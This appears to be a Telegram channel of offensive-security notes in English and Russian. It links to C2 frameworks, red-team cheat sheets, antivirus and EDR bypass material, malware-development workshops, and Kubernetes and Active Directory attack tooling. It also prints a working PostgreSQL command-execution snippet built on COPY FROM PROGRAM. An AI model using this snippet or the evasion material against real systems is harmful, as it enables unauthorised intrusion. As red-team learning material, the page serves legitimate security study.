offsec notes – Telegram
offsec notes
266 subscribers
16 photos
4 files
92 links
reading list
Download Telegram
The C2 Matrix

* detailed information about the C2 Matrix

* lab environment used to test the various C2s

* details about each C2 (install and use)

* how to setup attack infrastructure
Forwarded from Proxy Bar
ARTToolkit
*
Интерактивная шпаргалка, содержащая полезный список наступательных инструментов безопасности и соответствующих им команд/полезных данных, которые можно использовать в redteam
*
Link
malware development useful links

BypassAV - Repo with the essential techniques to bypass antivirus and EDR

Bypass AV (practical examples) - useful examples & links

shellcode-fluctuation - article

executing the payload in memory - article

maldev-for-dummies - A workshop about Malware Development


The post will be updated
#maldev
Forwarded from Offensive Xwitter
😈 [ MDSec @MDSecLabs ]

Interested in sharpening your red team AD recon? Check out our latest post by @domchell, "Active Directory Enumeration for Red Teams"

🔗 https://www.mdsec.co.uk/2024/02/active-directory-enumeration-for-red-teams/

🐥 [ tweet ]
ntlm directories scanner - utility for searching directories that accept ntlm in services such as
* OWA servers
* Skype for Business/Lync servers
* Autodiscover servers (autodiscover.domain.com and lyncdiscover.domain.com)
* ADFS servers
🐳1
Для любителей All-in-one
Web-check - open source инструмент для поиска информации о веб-приложении/хосте.

Совершает такие проверки, как
* IP Info
* Server Info
* DNS Records
* Email Configuration
* Open Ports
etc
Kubernetes Goat - Учебная платформа с лабами и материалами по безопасности куба

* Learning Kubernetes
* OWASP Kubernetes Top 10
* MITRE for kube
* Lab’s scenarios


#kubernetes
RCE in postgres
DROP TABLE IF EXISTS cmd_exec;
CREATE TABLE cmd_exec(cmd_output text);
COPY cmd_exec FROM PROGRAM 'id';
SELECT * FROM cmd_exec;
DROP TABLE IF EXISTS cmd_exec;


Автоматизация - Link
(Закомментить checkVersion(connection))
Самый быстрый способ получить список всех путей веб-приложения на Next.js:

console.log(__BUILD_MANIFEST.sortedPages)
Forwarded from k8s (in)security (r0binak)
Исследователи из WIZ опубликовали OpenSource инструмент NamespaceHound, который позволит найти вектора повышения привилегий в Kubernetes кластерах, где мультитенантность организована на уровне namespaces.

По сути, инструмент сочетает в себе функционал RBAC анализатора и PolicyEngine – он ищет возможные опасные права в кластере, а также избыточно привилегированные и опасные контейнеры (BadPods), с помощью которых потенциальный злоумышленник может нанести существенный импакт кластеру. Сейчас их внутренняя библиотека насчитывает 21 правило.

Более подробно о самом инструменте и мотивации его создания можно почитать в статье NamespaceHound: protecting multi-tenant K8s clusters.
Kubernetes Privilege Escalation
Link